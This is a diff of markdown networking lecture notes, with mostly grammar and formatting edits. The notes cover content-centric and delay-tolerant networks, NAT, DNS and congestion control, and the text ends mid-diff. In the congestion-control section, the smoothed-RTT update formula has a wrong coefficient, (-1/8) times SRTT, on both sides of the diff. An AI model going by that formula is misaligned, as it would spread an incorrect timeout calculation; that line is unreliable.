* The goal is to provide a network infrastructure capable of providing services better suited to today's application requirements
|
||||
* Content distribution and mobility
|
||||
* More resilience to disruption and failures
|
||||
- Content can be **collected** from the network, **processed** in the network and **stored** in the network.
|
||||
- The goal is to provide a network infrastructure capable of providing services better suited to today's application requirements
|
||||
- Content distribution and mobility
|
||||
- More resilience to disruption and failures
|
||||
|
||||
#### Network Evolution
|
||||
|
||||
**Traditional networking**
|
||||
|
||||
- Host-Centric communications, addressing and end-points
|
||||
- Host-centric communications, addressing and endpoints
|
||||
|
||||
**ICNs**
|
||||
|
||||
- Data-Centric communications addressing information
|
||||
- Decoupling in space - neither sender nor receiver need to know their partner.
|
||||
- Data-centric communications addressing information
|
||||
- Decoupling in space - neither sender nor receiver needs to know their partner.
|
||||
- Decoupling in time - *answer* not necessarily directly triggered by a *question*. **asynchronous communication**.
|
||||
|
||||
#### Approach
|
||||
|
||||
* Named Data Objects (NDOs)
|
||||
* In-network caching/storage
|
||||
* Multi-party communication through replication
|
||||
* Senders decoupled from receivers
|
||||
- Named Data Objects (NDOs)
|
||||
- In-network caching/storage
|
||||
- Multi-party communication through replication
|
||||
- Senders decoupled from receivers
|
||||
|
||||
### Dissemination Networking
|
||||
|
||||
* Data is requested by name, using any and all means available (IP, VPN tunnels, multi-cast, proxies etc)
|
||||
* Anything that hears the request and has a valid copy of the data can respond.
|
||||
* The returned data is signed, and optionally secured, so its integrity & association with name can be validated (data-Centric security)
|
||||
- Data is requested by name, using any and all means available (IP, VPN tunnels, multicast, proxies etc.)
|
||||
- Anything that hears the request and has a valid copy of the data can respond.
|
||||
- The returned data is signed, and optionally secured, so its integrity and association with its name can be validated (data-centric security)
|
||||
|
||||

|
||||
|
||||
* Change of network abstraction from **named host** to **named content** (content chunks).
|
||||
* Security is built in - **secures content** and **not the hosts**.
|
||||
* **Mobility** is present by design.
|
||||
* Can handle **static** and **dynamic** content.
|
||||
- Change of network abstraction from **named host** to **named content** (content chunks).
|
||||
- Security is built in - **secures content** and **not the hosts**.
|
||||
- **Mobility** is present by design.
|
||||
- Can handle **static** and **dynamic** content.
|
||||
|
||||
#### Naming Data
|
||||
|
||||
###### Solution 1 - Name the data
|
||||
|
||||
- **Flat** - non human readable identifiers
|
||||
- **Flat** - non-human-readable identifiers
|
||||
- `1HJKRH535KJH252JLH3424JLBNL`
|
||||
- **Hierarchical** - meaningful structured names
|
||||
- `/nytimes/sport/baseball/mets/game0224143`
|
||||
@@ -75,28 +75,28 @@ Apart from routing protocols that use direct identifiers of nodes, networking ca
|
||||
|
||||
- With a set of tags
|
||||
- `baseball, new york, mets`
|
||||
- With schema that defines attributes, values and relations among attributes
|
||||
- With a schema that defines attributes, values and relations among attributes
|
||||
|
||||
##### Using Names in CCNs (Content Centric Networks)
|
||||
|
||||
- The hierarchical structure is used to do *longest match look-ups* which guarantees $log(n)$ state scaling for globally accessible data.
|
||||
- The hierarchical structure is used to do *longest-match look-ups*, which guarantees $log(n)$ state scaling for globally accessible data.
|
||||
- Although CCN names are longer than IP identifiers, their **explicit structure** allows look-ups as efficient as IP's.
|
||||
|
||||
### ICN Forwarding
|
||||
|
||||
* Consumer *broadcasts* and *interest* over all available communication media
|
||||
* Interest identifies a *collection of data* whose name has the interest as a prefex.
|
||||
* Anything that hears the interest and has an element of the collection can respond with that data.
|
||||
- The consumer *broadcasts* an *interest* over all available communication media
|
||||
- The interest identifies a *collection of data* whose name has the interest as a prefix.
|
||||
- Anything that hears the interest and has an element of the collection can respond with that data.
|
||||
|
||||
### ICN Transport
|
||||
|
||||
* Data that matches an interest, *consumes* it.
|
||||
* Interest must be re-expressed to get new data.
|
||||
* Controlling re-expressions allows for traffic management and congestion control.
|
||||
* Multiple (distinct) interests in the same collection may be expressed
|
||||
- Data that matches an interest *consumes* it.
|
||||
- Interest must be re-expressed to get new data.
|
||||
- Controlling re-expressions allows for traffic management and congestion control.
|
||||
- Multiple (distinct) interests in the same collection may be expressed
|
||||
|
||||
### ICN Caching
|
||||
|
||||
* Storage and caching are integral part of the ICN service
|
||||
* All nodes potentially have caches. Requests for data can be satisfied by any node holding a copy in it's cache.
|
||||
* ICN combines caching at the network edge with in-network caching.
|
||||
- Storage and caching are an integral part of the ICN service
|
||||
- All nodes potentially have caches. Requests for data can be satisfied by any node holding a copy in its cache.
|
||||
- ICN combines caching at the network edge with in-network caching.
|
||||
@@ -1,15 +1,17 @@
|
||||
# Content Centric Networks
|
||||
# Content-Centric Networks
|
||||
|
||||
A Brief History of Networking
|
||||
|
||||
- Gen 1. The **phone system** (focus on the **wires**)
|
||||
- The utility of the system depends on running wires to every home & office.
|
||||
- Wires are the dominant cost.
|
||||
- A *call* is not the conversation, its the **PATH** between two end-office line cards.
|
||||
- A *phone number* is not the name/address of the caller, its a **program** for the end-office switch fabric to build a path to the destination line card.
|
||||
- A *call* is not the conversation; it's the **PATH** between two end-office line cards.
|
||||
- A *phone number* is not the name/address of the caller; it's a **program** for the end-office switch fabric to build a path to the destination line card.
|
||||
|
||||
- <img src="img/k.png" alt="switch board" style="zoom:50%;" />
|
||||
|
||||
- Path building is **non-local** and **encourages centralisation** and **monopoly**.
|
||||
- Calls fail is any element in the path fails so reliability goes down exponentially as the system scales up.
|
||||
- Calls fail if any element in the path fails, so reliability goes down exponentially as the system scales up.
|
||||
- Data cannot flow until the path is set up so efficiency decreases with setup time.
|
||||
|
||||
- Gen 2. The **Internet** (focus on the **endpoints**)
|
||||
@@ -31,8 +33,8 @@ A Brief History of Networking
|
||||
###### Cons
|
||||
|
||||
- *Connected* is a binary attribute.
|
||||
- Becoming part of the internet requires a globally unique, globally know IP address that's topologically stable on routing time scales.
|
||||
- Connecting is a heavy weight operation
|
||||
- Becoming part of the internet requires a globally unique, globally known IP address that's topologically stable on routing time scales.
|
||||
- Connecting is a heavyweight operation
|
||||
- The net struggles with moving nodes
|
||||
|
||||
#### Conversation and Dissemination
|
||||
@@ -41,7 +43,7 @@ Acquiring chunks of data (web pages, emails, videos etc) is not a conversation,
|
||||
|
||||
In a dissemination **the data matters**, not the supplier.
|
||||
|
||||
- Data is request by name.
|
||||
- Data is requested by name.
|
||||
- Anything that hears the request, and has a valid copy can respond.
|
||||
- The return data is signed, so integrity and association can be validated.
|
||||
|
||||
@@ -63,33 +65,33 @@ Data packets are authenticated with digital signatures.
|
||||
|
||||
#### CCN Forwarding
|
||||
|
||||
Consumer *broadcasts* and *interest* over all available communication media
|
||||
The consumer *broadcasts* an *interest* over all available communication media.
|
||||
|
||||
- e.g. `get '/parc.com/van/presentation.pdf'`
|
||||
- response: `heres '/parc.com/van/presentation.pdf/p1' <data>`
|
||||
|
||||
##### Names and Meaning
|
||||
|
||||
* Like IP, CCN nodes imposes no semantics on names
|
||||
* Meaning comes from **application**, **institution** and **global conventions** reflected in prefix forwarding rules.
|
||||
* Globally meaningful name leveraging the DNS global naming structure
|
||||
* `/parc.com/van/presentation.pdf`
|
||||
* Local and context sensitive, it refers to different objects depending on the room you're in.
|
||||
* `/thisRoom/projector`
|
||||
- Like IP, CCN nodes impose no semantics on names
|
||||
- Meaning comes from **application**, **institution** and **global conventions** reflected in prefix forwarding rules.
|
||||
- Globally meaningful name leveraging the DNS global naming structure
|
||||
- `/parc.com/van/presentation.pdf`
|
||||
- Local and context sensitive, it refers to different objects depending on the room you're in.
|
||||
- `/thisRoom/projector`
|
||||
|
||||
#### Strategy Layer
|
||||
|
||||
* When you do not care who you are talking to, you don't care if they change
|
||||
* When you are not having a conversation, there's no need to migrate conversation state.
|
||||
* Multi-point gives you multi-interface for free.
|
||||
* When all communication is locally flow balanced, your stack knows exactly whats working and how well.
|
||||
- When you do not care who you are talking to, you don't care if they change
|
||||
- When you are not having a conversation, there's no need to migrate conversation state.
|
||||
- Multi-point gives you multi-interface for free.
|
||||
- When all communication is locally flow-balanced, your stack knows exactly what's working and how well.
|
||||
|
||||
In the current Internet, Quality of Service (QoS) Problems are highly localised
|
||||
|
||||
* Roughly half the problems are from serial dependencies created by queues
|
||||
* The other half are caused from a lack of receiver based control over bottle-necked links.
|
||||
- Roughly half the problems are from serial dependencies created by queues
|
||||
- The other half are caused by a lack of receiver-based control over bottlenecked links.
|
||||
|
||||
Unlike IP, CCN is **local**, don't have queues and receivers have complete control
|
||||
Unlike IP, CCN is **local**, doesn't have queues, and gives receivers complete control.
|
||||
|
||||

|
||||
|
||||
|
||||
@@ -8,13 +8,13 @@
|
||||
|
||||
> **Characteristics**
|
||||
>
|
||||
> * High intermittent connectivity
|
||||
> * Extremely long message travel time
|
||||
> * Delay: finite speed of light
|
||||
> * Low Transmission reliability
|
||||
> * Inaccurate position
|
||||
> * Limited visibility
|
||||
> * Low asymmetric Data Rate
|
||||
> - High intermittent connectivity
|
||||
> - Extremely long message travel time
|
||||
> - Delay: finite speed of light
|
||||
> - Low Transmission reliability
|
||||
> - Inaccurate position
|
||||
> - Limited visibility
|
||||
> - Low asymmetric Data Rate
|
||||
>
|
||||
> **Security**
|
||||
>
|
||||
@@ -28,12 +28,12 @@
|
||||
>
|
||||
> **Characteristics**
|
||||
>
|
||||
> * High intermittent connectivity
|
||||
> * Mobility, destruction, noise & attacks, interference
|
||||
> * Low transmission reliability
|
||||
> * positioning inaccuracy
|
||||
> * limited visibility
|
||||
> * Low data rate
|
||||
> - High intermittent connectivity
|
||||
> - Mobility, destruction, noise & attacks, interference
|
||||
> - Low transmission reliability
|
||||
> - positioning inaccuracy
|
||||
> - limited visibility
|
||||
> - Low data rate
|
||||
>
|
||||
> **Security**
|
||||
>
|
||||
@@ -43,68 +43,68 @@
|
||||
|
||||
##### Rural Areas
|
||||
|
||||
>Providing internet connectivity to rural/developing areas
|
||||
> Providing internet connectivity to rural/developing areas
|
||||
>
|
||||
>**Characteristics**
|
||||
> **Characteristics**
|
||||
>
|
||||
>- Intermittent connectivity
|
||||
>- Mobility - sparse development
|
||||
>- High propagation delay
|
||||
>- Asymmetric data rate
|
||||
> - Intermittent connectivity
|
||||
> - Mobility - sparse development
|
||||
> - High propagation delay
|
||||
> - Asymmetric data rate
|
||||
>
|
||||
>
|
||||
> 
|
||||
>
|
||||
>**Security**
|
||||
> **Security**
|
||||
>
|
||||
>- Standard cryptographic techniques such as PKI and transparent encrypted file systems
|
||||
> - Standard cryptographic techniques such as PKI and transparent encrypted file systems
|
||||
|
||||
- Disaster struck areas
|
||||
- Disaster-struck areas
|
||||
- Disconnected kiosks in rural areas
|
||||
- Remote sensing applications
|
||||
|
||||
But also
|
||||
|
||||
- Bulk data distribution in urban areas
|
||||
- Sharing of individual contents in urban areas
|
||||
- Mobile location-aware sensing application
|
||||
- Sharing of individual content in urban areas
|
||||
- Mobile location-aware sensing applications
|
||||
- Social mobile applications
|
||||
|
||||
#### DTN Security Goals
|
||||
|
||||
Due to the resource-causticity that DTNs have, the focus is on protecting the DTN infrastructure from unauthorised access and use.
|
||||
Due to the resource scarcity of DTNs, the focus is on protecting the DTN infrastructure from unauthorised access and use.
|
||||
|
||||
* Prevent **access** by unauthorised applications.
|
||||
* Prevent unauthorised applications from asserting control over DTN infrastructure.
|
||||
* Prevent authorised applications from sending bundles at a rate or class of service for which they **don't have permissions for**.
|
||||
* Detect and discard bundles that were sent from unauthorised applications/users.
|
||||
* Detect and discard bundles who's headers have been modified.
|
||||
* Detect and discard compromised entities.
|
||||
- Prevent **access** by unauthorised applications.
|
||||
- Prevent unauthorised applications from asserting control over DTN infrastructure.
|
||||
- Prevent authorised applications from sending bundles at a rate or class of service for which they **don't have permission**.
|
||||
- Detect and discard bundles that were sent from unauthorised applications/users.
|
||||
- Detect and discard bundles whose headers have been modified.
|
||||
- Detect and discard compromised entities.
|
||||
|
||||
Secondary emphasis is on providing optional end-to-end security services to bundle applications.
|
||||
|
||||
#### DTN Security Challenges
|
||||
|
||||
* High round-trip times and disconnections
|
||||
* Do not allow frequent distribution of a large number of certificates and encryption keys end-to-end.
|
||||
* More scalable to use user's keys and credentials at neighbouring or nearby nodes.
|
||||
* Delays or loss of connectivity to a key or certificate server
|
||||
* Multiple certificate authorities desirable but not sufficient and certificate revocation not appropriate
|
||||
* Long delays
|
||||
* Messages may be valid for days/weeks, so message expiration may not be able to be depended on to rid the network of unwanted messages as efficiently as in other types of networks.
|
||||
* Constrained Bandwidth
|
||||
* Need to minimise the cost of security in terms of network overhead (header bits).
|
||||
- High round-trip times and disconnections
|
||||
- Do not allow frequent distribution of a large number of certificates and encryption keys end-to-end.
|
||||
- More scalable to use users' keys and credentials at neighbouring or nearby nodes.
|
||||
- Delays or loss of connectivity to a key or certificate server
|
||||
- Multiple certificate authorities desirable but not sufficient and certificate revocation not appropriate
|
||||
- Long delays
|
||||
- Messages may be valid for days/weeks, so message expiration may not be able to be depended on to rid the network of unwanted messages as efficiently as in other types of networks.
|
||||
- Constrained Bandwidth
|
||||
- Need to minimise the cost of security in terms of network overhead (header bits).
|
||||
|
||||
###### Traditional PKI not applicable
|
||||
|
||||
* Traditional symmetric cryptography approaches are not suitable for DTNs for two major reasons
|
||||
* In PKI a user authenticates another users public key using a certificate
|
||||
* This is not possible without online access to the receivers public key or certificates
|
||||
* PKIs implement key revocation based on frequently updated online certificate revocation lists
|
||||
* In the absence of instant online access to CAs servers, a receiver cannot authenticate the sender's certificate.
|
||||
- Traditional symmetric cryptography approaches are not suitable for DTNs for two major reasons
|
||||
- In PKI, a user authenticates another user's public key using a certificate
|
||||
- This is not possible without online access to the receiver's public key or certificates
|
||||
- PKIs implement key revocation based on frequently updated online certificate revocation lists
|
||||
- In the absence of instant online access to CAs' servers, a receiver cannot authenticate the sender's certificate.
|
||||
|
||||
###### Identity Based Cryptography not applicable
|
||||
|
||||
Identity Based Cryptography (IBC) schemes where the public key of each entity is replaced by its identity and associated public formatting policies are not suitable for the security in DTNs
|
||||
Identity-Based Cryptography (IBC) schemes, where the public key of each entity is replaced by its identity and associated public formatting policies, are not suitable for security in DTNs.
|
||||
|
||||
- IBC does not solve the key management problem in DTNs
|
||||
- It is not scalable because it assumes that a user must know the public parameters for all the trusted parties.
|
||||
@@ -112,20 +112,20 @@ Identity Based Cryptography (IBC) schemes where the public key of each entity is
|
||||
###### Mobile ad hoc Key Management Proposals not applicable
|
||||
|
||||
- Virtual Certificate Authority
|
||||
- Not applicable due to no trusted third parties
|
||||
- Not applicable due to the absence of trusted third parties
|
||||
- Certificate chaining based on pretty good privacy (PGP)
|
||||
- Not applicable due to insufficient density of certificate graphs
|
||||
- Peer-to-peer key management based on mobilty
|
||||
- Peer-to-peer key management based on mobility
|
||||
- Not applicable due to certificate revocation mechanism
|
||||
|
||||
#### Existing Mandatory DTN Security
|
||||
|
||||
Based on the *bundle* protocol
|
||||
|
||||
* Hop-by-hop bundle integrity
|
||||
* Hop-by-hop bundle sender authentication
|
||||
* Access Control (only legit users with right permissions)
|
||||
* Limited protection from DoS attacks
|
||||
- Hop-by-hop bundle integrity
|
||||
- Hop-by-hop bundle sender authentication
|
||||
- Access Control (only legit users with right permissions)
|
||||
- Limited protection from DoS attacks
|
||||
|
||||

|
||||
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
# Enabling Real-Time communications and Services in Heterogeneous Networks of Drones and Vehicles
|
||||
# Enabling Real-Time Communications and Services in Heterogeneous Networks of Drones and Vehicles
|
||||
|
||||
### Real World Experiments
|
||||
|
||||
@@ -6,9 +6,9 @@
|
||||
|
||||
- Agricultural context in UK
|
||||
- The production of potatoes or livestock has always been a major part of farming
|
||||
- There has always been a need for farmers to be able to observe their field crops or animals as often as possible so that they are informed quickly about potential deep rooted problems in the fields.
|
||||
- There has always been a need for farmers to be able to observe their field crops or animals as often as possible so that they are informed quickly about potential deep-rooted problems in the fields.
|
||||
|
||||
Enable mobile reliable multi-hop DTN communications (in field near Nottingham)
|
||||
Enable reliable mobile multi-hop DTN communications (in a field near Nottingham).
|
||||
|
||||
- 2 Flying drones
|
||||
- 1 Vehicle
|
||||
@@ -16,25 +16,24 @@ Enable mobile reliable multi-hop DTN communications (in field near Nottingham)
|
||||
- Raspberry Pis
|
||||
- These capture and send data to the drones, which forward it to a node with higher computational output
|
||||
|
||||
The two static sensing nodes are deployed on two different sides of the field out of reach of each other while the drone acts as a intermediaries.
|
||||
The two static sensing nodes are deployed on two different sides of the field, out of reach of each other, while the drone acts as an intermediary.
|
||||
|
||||
All sensing nodes could measure
|
||||
|
||||
- Air temp
|
||||
- wind speed
|
||||
- soil temp
|
||||
- Air temperature
|
||||
- Wind speed
|
||||
- Soil temperature
|
||||
|
||||
We measure average edge to edge (E2E) delays of content query and dissemination in the network
|
||||
We measure average edge-to-edge (E2E) delays of content queries and dissemination in the network.
|
||||
|
||||
- Two drones and one vehicle (3 intermediaries) result in lower delays
|
||||
|
||||
#### Smart City Applications
|
||||
|
||||
- More focused on single hop
|
||||
- More focused on single-hop communication
|
||||
- 1 Hovering drone (publisher)
|
||||
- Moving vehicle (subscriber)
|
||||
- The drone continuously sends information such as sensors readings, street images, traffic videos to the vehicle which monitors road conditions
|
||||
- Single hop communications is significantly affected by physical obstructions
|
||||
- The drone continuously sends information such as sensor readings, street images and traffic videos to the vehicle, which monitors road conditions
|
||||
- Single-hop communication is significantly affected by physical obstructions
|
||||
- Therefore the latency went down in suburbs compared to city centres
|
||||
- Height of the drone is important as well
|
||||
|
||||
@@ -70,9 +70,9 @@ Precedence
|
||||
|
||||
##### Problems
|
||||
|
||||
- End to end semantics
|
||||
- End-to-end semantics
|
||||
- Mapping to service level agreement
|
||||
- If an internet company sells a network with a certain speed, this might have legal repercussions if QoS are enacted
|
||||
- If an internet company sells a network with a certain speed, this might have legal repercussions if QoS is enacted
|
||||
- Mapping to application demands
|
||||
|
||||
### Integrated Services (IntServ)
|
||||
@@ -98,19 +98,19 @@ Precedence
|
||||
|
||||
### Address Shortages
|
||||
|
||||
**IPv4** supports 32 bit addresses
|
||||
**IPv4** supports 32-bit addresses
|
||||
|
||||
- 95% allocated already (440,000 netblocks)
|
||||
|
||||
**IPv6** supports 128-bit address
|
||||
**IPv6** supports 128-bit addresses
|
||||
|
||||
- Loads of addresses :white_check_mark:
|
||||
- Routing protocols need to ported :negative_squared_cross_mark:
|
||||
- Routing protocols need to be ported :negative_squared_cross_mark:
|
||||
- Associated services needing to move :negative_squared_cross_mark:
|
||||
|
||||
### Network Address Translation
|
||||
|
||||
Because IPv6 did not magically solve address shortage problem and not all routers are ipv6 aware, we had to rely on NAT.
|
||||
Because IPv6 did not magically solve the address shortage problem and not all routers are IPv6-aware, we had to rely on NAT.
|
||||
|
||||
- Private Addressing, `RFC1918`
|
||||
- `172.16/12`, `192.168/16`, `10/8`
|
||||
@@ -120,7 +120,7 @@ Because IPv6 did not magically solve address shortage problem and not all router
|
||||
- Use private addresses internally (within the local network)
|
||||
- Map into a (small) set of routable addresses
|
||||
- Use source ports to distinguish connections
|
||||
- For large scale **carrier grade NAT** [`RFC6598`] on `100.64/10`
|
||||
- For large-scale **carrier-grade NAT** [`RFC6598`] on `100.64/10`
|
||||
|
||||
#### Implementation
|
||||
|
||||
@@ -136,7 +136,7 @@ Because IPv6 did not magically solve address shortage problem and not all router
|
||||
ea:ep - NAT address : NAT port
|
||||
```
|
||||
|
||||
When client receives packet from server 1 `da:dp`, the NAT translates the NAT address `ea:ep` to the clients internet address and port `ia:ip`.
|
||||
When the client receives a packet from server 1 `da:dp`, the NAT translates the NAT address `ea:ep` to the client's internet address and port `ia:ip`.
|
||||
|
||||
###### Address Restricted Cone NAT
|
||||
|
||||
@@ -148,4 +148,4 @@ If the router receives a packet from a bad IP or bad port, it will be dropped.
|
||||
|
||||
###### Symmetric NAT
|
||||
|
||||
Here the internal address is obfuscated from the external servers, same client can use different ports for different communications.
|
||||
Here, the internal address is obfuscated from the external servers. The same client can use different ports for different communications.
|
||||
@@ -1,6 +1,6 @@
|
||||
# Naming
|
||||
|
||||
IPs are not human readable.
|
||||
IPs are not human-readable.
|
||||
|
||||
Not always the appropriate granularity
|
||||
|
||||
@@ -14,7 +14,7 @@ A file maps names to addresses
|
||||
- Windows
|
||||
- `C:\Windows\System32\drivers\etc\hosts`
|
||||
|
||||
These are simple but neither automatic or scalable which led to **DNS**.
|
||||
These are simple but neither automatic nor scalable, which led to **DNS**.
|
||||
|
||||
- Was initially `RFC882`
|
||||
- Now is `RFC1035, 1987`
|
||||
@@ -22,23 +22,23 @@ These are simple but neither automatic or scalable which led to **DNS**.
|
||||
DNS is a consistent namespace
|
||||
|
||||
- No reference to addresses, routes etc
|
||||
- Is hierarchical, distributed & cache
|
||||
- All of which to help with scalability
|
||||
- Is hierarchical, distributed and cached
|
||||
- All of which help with scalability
|
||||
- **Federated** - sources control trade-off
|
||||
- This just means DNS are worldwide
|
||||
- **Flexible** - many record
|
||||
- This just means DNS is worldwide
|
||||
- **Flexible** - many records
|
||||
- Simple client-server name resolution protocol
|
||||
|
||||
#### Components
|
||||
|
||||
- *Domain name space* and *resource records*
|
||||
- Tree structured name space
|
||||
- Tree-structured name space
|
||||
- Data associated with names
|
||||
- *Name server*
|
||||
- Contains records for a sub tree
|
||||
- Contains records for a subtree
|
||||
- May cache information about any part of the tree
|
||||
- Resolver
|
||||
- Extract information from tree upon client requests
|
||||
- Extracts information from the tree upon client requests
|
||||
- `gethostbyname()`
|
||||
|
||||

|
||||
@@ -48,12 +48,12 @@ DNS is a consistent namespace
|
||||
- Ultimate authority with the US Dept. of commerce (NITA)
|
||||
- Managed by IANA, operated by ICANN, maintained by Verisign
|
||||
- Started with only thirteen root server clusters
|
||||
- Now much more
|
||||
- Top level Domains, TLDs
|
||||
- Now many more
|
||||
- Top-level domains, TLDs
|
||||
- Operated by registrars, delegated by ICANN
|
||||
- Delegate zones to other registrars
|
||||
- and so on down the hierarchy
|
||||
- Eventually customer rents a name - their **zone**
|
||||
- Eventually, a customer rents a name - their **zone**
|
||||
- Registrar installs appropriate *resource records*
|
||||
- Associated with names within the zone
|
||||
|
||||
@@ -113,7 +113,7 @@ nott.ac.uk. 3600 IN MX 2 mx192.emailfiltering.com.
|
||||
nott.ac.uk 3600 IN MX 3 mx193.emailfiltering.com.
|
||||
```
|
||||
|
||||
What happens when the resolver queries a server that doesn't know the answer? two solutions:
|
||||
What happens when the resolver queries a server that doesn't know the answer? There are two solutions:
|
||||
|
||||
1. **Iterative** (required)
|
||||
- Server responds indicating who to ask next
|
||||
@@ -125,7 +125,7 @@ What happens when the resolver queries a server that doesn't know the answer? tw
|
||||
|
||||
#### Load Balancing
|
||||
|
||||
DNS may have multiple servers, when a query comes various algorithms can be used to choose the best one, this can be geographical location.
|
||||
DNS may have multiple servers. When a query arrives, various algorithms can be used to choose the best one, for example, based on geographical location.
|
||||
|
||||
#### Operational & Security Issues
|
||||
|
||||
|
||||
@@ -2,8 +2,8 @@
|
||||
|
||||
Achieving reliability:
|
||||
|
||||
- Re-transmitting lost data
|
||||
- This is done by detecting lost via explicit acknowledgment
|
||||
- Retransmitting lost data
|
||||
- This is done by detecting loss via explicit acknowledgement
|
||||
- These can be positive or negative
|
||||
|
||||
### Stop ‘n’ Wait
|
||||
@@ -16,20 +16,20 @@ Simplest possible paradigm
|
||||
|
||||

|
||||
|
||||
This has really poor performance in high latency and uses high bandwidth (half the bandwidth is overhead (acknowledgements))
|
||||
This has really poor performance at high latency and uses high bandwidth (half the bandwidth is overhead from acknowledgements).
|
||||
|
||||
**Rate control**: Never sending too fast for the network
|
||||
|
||||
**Sliding window**: allow unacknowledged data in flight (data to be sent)
|
||||
|
||||
**Retransmission TimeOut**: how long to wait to decide a segment is lost
|
||||
**Retransmission Timeout**: how long to wait before deciding a segment is lost
|
||||
|
||||
- This requires estimates of dynamic quantities
|
||||
|
||||
- Permit N segments in flight
|
||||
- Timeout implies loss
|
||||
- Retransmit from lost packet onward
|
||||
- This is bad as imagine if only packet 3 is lost out of 5, this means client will resend 3-5.
|
||||
- This is bad: imagine if only packet 3 is lost out of 5. This means the client will resend packets 3-5.
|
||||
|
||||
##### Congestion Collapse
|
||||
|
||||
@@ -37,13 +37,13 @@ When network load is too high, it causes *congestion collapse*
|
||||
|
||||
Why?
|
||||
|
||||
- The routers buffers fill up, traffic is discarded, hosts retransmit
|
||||
- The routers' buffers fill up, traffic is discarded, and hosts retransmit
|
||||
- Retransmit rates increase since more data was lost
|
||||
- This was solved in “Congestion Avoidance and Control”
|
||||
|
||||
#### Stability of the Internet
|
||||
|
||||
Flows and protocols **include some sort of congestion control** and adaptation so that they moderate their bandwidth use, limit packet loss as well as get approximately fair share of available network bandwidth
|
||||
Flows and protocols **include some sort of congestion control** and adaptation so that they moderate their bandwidth use, limit packet loss and get an approximately fair share of available network bandwidth.
|
||||
|
||||
1. **Responsiveness** defined as a number of round-trip times of sustained congestion required to reduce the rate by half
|
||||
2. **Stability and smoothness** defined as the largest reduction of the sending rate in one round trip time in a steady state scenario
|
||||
@@ -51,7 +51,7 @@ Flows and protocols **include some sort of congestion control** and adaptation s
|
||||
|
||||
Mimicking TCP behaviour for multimedia congestion control results in fairness towards TCP but also in significant oscillations in bandwidth
|
||||
|
||||
- Multimedia streaming applications need to **have much lower variation at throughput** over time compared to TCP to result in relatively smooth sending rates that are of importance to the end-user perceived quality.
|
||||
- Multimedia streaming applications need to **have much lower variation in throughput** over time compared to TCP to result in relatively smooth sending rates that are important to the quality perceived by the end user.
|
||||
- The penalty for having smoother throughput than TCP while competing for bandwidth is that multimedia congestion control responds slower than TCP to changes in available bandwidth.
|
||||
- Thus, if multimedia traffic wants smooth throughput, it needs to avoid TCP’s halving of the sending rate in response to a single packet drop.
|
||||
|
||||
@@ -60,18 +60,18 @@ Mimicking TCP behaviour for multimedia congestion control results in fairness to
|
||||
- When choosing the method for packet loss detection, it is important to choose a method that **detects packet losses as early and accurately as possible**
|
||||
- Incorrect detection & late packet delivery can lead to incorrect packet loss estimation
|
||||
- This causes unresponsive & unfair behaviour
|
||||
- Calculating packet loss rates can be done over various lengths of time intervals.
|
||||
- Packet loss rates can be calculated over time intervals of various lengths.
|
||||
- Shorter intervals result in more responsive behaviour but are more susceptible to noise
|
||||
- Longer intervals = smoother but less responsive
|
||||
- It is important to find a balance
|
||||
- In order to guarantee sufficient responsiveness to congestion and preserver smoothness, methods for detecting & calculating packet loss must be chosen carefully.
|
||||
- In order to guarantee sufficient responsiveness to congestion and preserve smoothness, methods for detecting and calculating packet loss must be chosen carefully.
|
||||
1. What mechanism can be used for packet loss detection?
|
||||
2. What algorithm can be used for packet loss rate calculation?
|
||||
3. Where can packet loss detection and calculation happen?
|
||||
|
||||
###### Approach
|
||||
|
||||
- All sent packets are marked with consecutive sequence of numbers
|
||||
- All sent packets are marked with a consecutive sequence of numbers
|
||||
- When a packet is sent a timeout value for this packet is computed and an entry containing the sequence number and the timeout value is inserted into a list and kept there until packet delivery is acknowledged or considered to be lost
|
||||
- If the timeout expires before the packet is acknowledged, the corresponding packet is considered to be lost
|
||||
- In order to adapt to varying and unpredictable network conditions, the timeout is not fixed, but computed based on one of the algorithms for TCP timeout computation
|
||||
@@ -82,31 +82,31 @@ This is mostly used for multimedia situations
|
||||
|
||||
RTT - round trip times
|
||||
|
||||
- Before the first packet is ACK and RTT measurement is made, the sender sets the TIMEOUT to a certain initial value
|
||||
- Before the first packet is acknowledged and an RTT measurement is made, the sender sets the TIMEOUT to a certain initial value
|
||||
- This value is usually **2.5-3 seconds for TCP**
|
||||
- For real time interactive multimedia traffic, the timeout value should be set to **0.5 seconds** as this is the time where audio delay affects media
|
||||
- For real-time interactive multimedia traffic, the timeout value should be set to **0.5 seconds** as this is the time when audio delay affects media
|
||||
- When the first `RTT` measurement is taken the sender sets the smoothed `RTT` (`SRTT`), `RTT` variance (`RTTVAR`) and `TIMEOUT` in the following way
|
||||
- `SRTT = RTT`
|
||||
- `RTTVAR = RTT/2`
|
||||
- `TIMEOUT = `$\mu\cdot$`SRTT + 4*RTTVAR`
|
||||
- Where $\mu$ is a constant, which in this implementation is 1.08 (obtained experimentally)
|
||||
- When subsequent `RTT` measurements are made the sender sets the `RTTVAR`, `SRTT`, TIMEOUT
|
||||
- When subsequent `RTT` measurements are made, the sender sets `RTTVAR`, `SRTT` and `TIMEOUT`
|
||||
- `RTTVAR`$= (1 - \frac{1}{4}) \times$`RTTVAR`$+ \frac14 \times |$`SRTT`$-$`RTT`$|$
|
||||
- `SRTT`$= (-\frac18)\times$`SRTT`$+\frac18\times$`RTT`
|
||||
- `TIMEOUT`$= \mu\times$`SRTT`$+ 4\times$`RTTVAR`
|
||||
|
||||
###### Packet loss rate calculation
|
||||
|
||||
- Real time interactive multimedia approaches typically use the **weighted Loss Interval Average (WLIA)**
|
||||
- Real-time interactive multimedia approaches typically use the **weighted Loss Interval Average (WLIA)**
|
||||
- It relies on **using loss events** and **loss intervals** for correct computation of packet loss rate and is in accordance with how TCP performs packet loss calculation
|
||||
- A **loss event** is defined as a number of packets lost within a single RTT
|
||||
|
||||
This can be done either on the sending or receiving side
|
||||
|
||||
**Sender-side**: if the packet loss detection is done in the sender, the sender can use timeout mechanism for each packet or gap in sequence numbers of the acknowledged
|
||||
**Sender-side**: if packet loss detection is done by the sender, the sender can use a timeout mechanism for each packet or a gap in the sequence numbers of acknowledged packets.
|
||||
|
||||
- The receiver has to acknowledge either every packet or every packet not received
|
||||
- Acknowledging every packet can introduce high levels of traffic between between sender and receiver
|
||||
- Acknowledging every packet can introduce high levels of traffic between the sender and receiver
|
||||
- This is solved by having receivers send report summaries of losses every nth packet or nth RTT
|
||||
|
||||
**Receiver-side**: Packet loss is detected in the receiver and explicitly reported back to the sender
|
||||
@@ -116,30 +116,30 @@ This can be done either on the sending or receiving side
|
||||
|
||||
##### Sender vs Receiver Detection
|
||||
|
